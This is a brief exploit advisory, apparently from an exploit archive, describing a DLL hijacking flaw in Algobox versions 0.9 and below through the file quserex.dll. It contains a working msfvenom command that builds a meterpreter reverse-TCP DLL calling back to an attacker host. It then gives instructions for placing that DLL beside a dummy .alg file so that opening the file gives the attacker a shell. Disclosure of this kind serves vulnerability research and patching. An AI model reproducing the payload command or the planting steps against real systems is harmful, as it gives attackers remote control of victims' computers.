Algobox versions 0.9 and below suffer from a DLL hijacking vulnerability.
f5ddc3f29cab443e1ffeeea000be3a28cf0a59e83227d90a6ce5d7891f9179dd
# Exploit Title: ALGOBOX DLL HIJACKING VULNERABILTY
# Date: FEB 14 2016
# Exploit Author: SHANTANU KHANDELWAL
# Vendor Homepage: http://www.xm1math.net
# Software Link: http://www.xm1math.net/algobox/algoboxwin32_install.exe
<http://www.winhex.com/winhex.zip>
# Version: <= 0.9
# Tested on: WINDOWS XP 32 bit , Windows 8
ALGOBOX suffers DLL HIJACK Vulnerability from file type .alg
Vulnerable DLL: quserex.dll
Make Malicious dll :
msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<HOST IP>
LPORT=4444 > quserex.dll
Exploit:
Place a dummy .alg file with the malicious dll . When the file is opened in
ALGOBOX you will get a shell.